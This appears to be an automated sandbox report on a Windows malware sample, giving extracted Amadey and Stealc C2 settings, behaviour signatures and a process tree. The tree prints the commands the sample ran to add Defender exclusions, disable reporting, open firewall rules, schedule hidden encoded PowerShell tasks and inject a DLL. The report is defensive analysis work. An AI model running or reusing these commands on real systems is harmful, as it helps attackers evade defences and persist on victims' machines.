Analysis

  • max time kernel
    70s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-04-2024 13:28

General

  • Target

    bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe

  • Size

    1.8MB

  • MD5

    0193ae529e1b5a9af6c9e0a9764e7c0f

  • SHA1

    4db7d28f2b787386c3f60cc3d646d25553311ae3

  • SHA256

    bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e

  • SHA512

    355f310885fc61f433244bdd11b65d534891e77daffb2fe4005f59f619ce564615b8959e2a99049d849dd07dfccdeba07889d839344788e5dfbc58f9b738b5c7

  • SSDEEP

    49152:mGfT2VqIZmU3m1DLsWTHXUn8jo59exxc82:mWT67ZPULsGHkzWxc

Malware Config

Extracted

Family

amadey

Version

4.17

C2

http://185.215.113.32

Attributes
  • install_dir

    00c07260dc

  • install_file

    explorgu.exe

  • strings_key

    461809bd97c251ba0c0c8450c7055f1d

  • url_paths

    /yandex/index.php

rc4.plain

Extracted

Family

stealc

C2

http://185.172.128.209

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 13 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 10 IoCs
  • Executes dropped EXE 22 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 10 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 9 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 37 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2540
      • C:\Windows\SysWOW64\dialer.exe
        "C:\Windows\system32\dialer.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2568
    • C:\Users\Admin\AppData\Local\Temp\bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe"
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      PID:1376
    • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
      C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe
        "C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4548
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1100
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
          3⤵
          • Drops startup file
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2884
          • C:\Users\Admin\Pictures\T69JRNcJ5Pb8Kvyeh54nUcEz.exe
            "C:\Users\Admin\Pictures\T69JRNcJ5Pb8Kvyeh54nUcEz.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:3580
            • C:\Users\Admin\AppData\Local\Temp\u2rg.0.exe
              "C:\Users\Admin\AppData\Local\Temp\u2rg.0.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:976
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe"
                6⤵
                  PID:5396
                  • C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe
                    "C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe"
                    7⤵
                    • Executes dropped EXE
                    PID:5784
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe
                      8⤵
                        PID:5164
                        • C:\Windows\SysWOW64\PING.EXE
                          ping 2.2.2.2 -n 1 -w 3000
                          9⤵
                          • Runs ping.exe
                          PID:1420
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 2744
                    6⤵
                    • Program crash
                    PID:5632
                • C:\Users\Admin\AppData\Local\Temp\u2rg.1.exe
                  "C:\Users\Admin\AppData\Local\Temp\u2rg.1.exe"
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1408
                  • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
                    "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
                    6⤵
                      PID:5792
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3580 -s 1532
                    5⤵
                    • Program crash
                    PID:3128
                • C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe
                  "C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:4864
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -nologo -noprofile
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2528
                  • C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe
                    "C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe"
                    5⤵
                      PID:5400
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        6⤵
                          PID:6112
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                          6⤵
                            PID:6136
                            • C:\Windows\system32\netsh.exe
                              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                              7⤵
                              • Modifies Windows Firewall
                              PID:816
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            6⤵
                              PID:5840
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              6⤵
                                PID:4764
                          • C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe
                            "C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe"
                            4⤵
                            • Executes dropped EXE
                            PID:4440
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell -nologo -noprofile
                              5⤵
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4648
                            • C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe
                              "C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe"
                              5⤵
                                PID:5496
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -nologo -noprofile
                                  6⤵
                                    PID:5292
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                    6⤵
                                      PID:5288
                                      • C:\Windows\system32\netsh.exe
                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                        7⤵
                                        • Modifies Windows Firewall
                                        PID:4364
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      6⤵
                                        PID:5884
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        6⤵
                                          PID:3552
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 832
                                        5⤵
                                        • Program crash
                                        PID:708
                                    • C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe
                                      "C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      PID:2492
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -nologo -noprofile
                                        5⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:3472
                                      • C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe
                                        "C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe"
                                        5⤵
                                          PID:5672
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -nologo -noprofile
                                            6⤵
                                              PID:4484
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                                              6⤵
                                                PID:1608
                                                • C:\Windows\system32\netsh.exe
                                                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                  7⤵
                                                  • Modifies Windows Firewall
                                                  PID:5900
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -nologo -noprofile
                                                6⤵
                                                  PID:5680
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -nologo -noprofile
                                                  6⤵
                                                    PID:1980
                                                  • C:\Windows\rss\csrss.exe
                                                    C:\Windows\rss\csrss.exe
                                                    6⤵
                                                      PID:3896
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -nologo -noprofile
                                                        7⤵
                                                          PID:5468
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          7⤵
                                                          • Creates scheduled task(s)
                                                          PID:2892
                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                          schtasks /delete /tn ScheduledUpdate /f
                                                          7⤵
                                                            PID:1696
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -nologo -noprofile
                                                            7⤵
                                                              PID:2792
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -nologo -noprofile
                                                              7⤵
                                                                PID:5388
                                                              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                                                                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                7⤵
                                                                  PID:2632
                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                  7⤵
                                                                  • Creates scheduled task(s)
                                                                  PID:5696
                                                                • C:\Windows\windefender.exe
                                                                  "C:\Windows\windefender.exe"
                                                                  7⤵
                                                                    PID:2548
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                      8⤵
                                                                        PID:3188
                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                          sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                          9⤵
                                                                          • Launches sc.exe
                                                                          PID:5652
                                                              • C:\Users\Admin\Pictures\nZXf9m6T3j0fmQmAo2ECjkpw.exe
                                                                "C:\Users\Admin\Pictures\nZXf9m6T3j0fmQmAo2ECjkpw.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Suspicious use of SetThreadContext
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3816
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                  5⤵
                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:4240
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 620
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:2372
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 644
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:2372
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 868
                                                                  5⤵
                                                                  • Program crash
                                                                  PID:2020
                                                              • C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe
                                                                "C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe" --silent --allusers=0
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Enumerates connected drives
                                                                PID:3800
                                                                • C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe
                                                                  C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6f27e1d0,0x6f27e1dc,0x6f27e1e8
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:3076
                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\G0jT3CGihLOYKL4sbc74s4ak.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\G0jT3CGihLOYKL4sbc74s4ak.exe" --version
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:3780
                                                                • C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe
                                                                  "C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3800 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240401133030" --session-guid=32799665-0bde-4673-b118-8a8ed9eaaf03 --server-tracking-blob=OWM3NmYzNWU3YmZlNzc0NGE2MGQwYjQwOGI4YmJkZmQ4MGIyNGZiNmViY2Q0ZTFjYmI3MWExOWM3NTljOWM3OTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE5NzgyMDkuNDM5OSIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6ImYzMjgzMmU4LWI5NWQtNDkyZC1iNzAwLTgwMjc4MDUzODY0NiJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1804000000000000
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  • Enumerates connected drives
                                                                  PID:2424
                                                                  • C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe
                                                                    C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2a8,0x2ac,0x2b0,0x278,0x2b4,0x6e8be1d0,0x6e8be1dc,0x6e8be1e8
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:5016
                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
                                                                  5⤵
                                                                    PID:940
                                                                  • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe" --version
                                                                    5⤵
                                                                      PID:5572
                                                                      • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xd10040,0xd1004c,0xd10058
                                                                        6⤵
                                                                          PID:5968
                                                                    • C:\Users\Admin\Pictures\LxSSn55Rw88rJ6lmDBQ8L4ps.exe
                                                                      "C:\Users\Admin\Pictures\LxSSn55Rw88rJ6lmDBQ8L4ps.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:4748
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS27B7.tmp\Install.exe
                                                                        .\Install.exe
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        PID:4348
                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS533C.tmp\Install.exe
                                                                          .\Install.exe /ydfmdidw "385118" /S
                                                                          6⤵
                                                                          • Checks BIOS information in registry
                                                                          • Executes dropped EXE
                                                                          • Enumerates system info in registry
                                                                          PID:4380
                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                            7⤵
                                                                              PID:5876
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                8⤵
                                                                                  PID:5564
                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                    9⤵
                                                                                      PID:924
                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                      9⤵
                                                                                        PID:1056
                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                    7⤵
                                                                                      PID:5968
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                        8⤵
                                                                                          PID:5576
                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                            9⤵
                                                                                              PID:5828
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                              9⤵
                                                                                                PID:6008
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "gyIzNkbkI" /SC once /ST 09:32:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                            7⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:6124
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /run /I /tn "gyIzNkbkI"
                                                                                            7⤵
                                                                                              PID:5740
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              schtasks /DELETE /F /TN "gyIzNkbkI"
                                                                                              7⤵
                                                                                                PID:772
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\aelnwhS.exe\" id /QHsite_idTsk 385118 /S" /V1 /F
                                                                                                7⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:4440
                                                                                        • C:\Users\Admin\Pictures\q6fTDfvQIk0vQg4JK85pUzGa.exe
                                                                                          "C:\Users\Admin\Pictures\q6fTDfvQIk0vQg4JK85pUzGa.exe"
                                                                                          4⤵
                                                                                          • Modifies firewall policy service
                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                          • Checks BIOS information in registry
                                                                                          • Executes dropped EXE
                                                                                          • Checks whether UAC is enabled
                                                                                          • Drops file in System32 directory
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:2344
                                                                                        • C:\Users\Admin\Pictures\Bp69MLnON446Ce82F0kC5faD.exe
                                                                                          "C:\Users\Admin\Pictures\Bp69MLnON446Ce82F0kC5faD.exe"
                                                                                          4⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2584
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS26AD.tmp\Install.exe
                                                                                            .\Install.exe
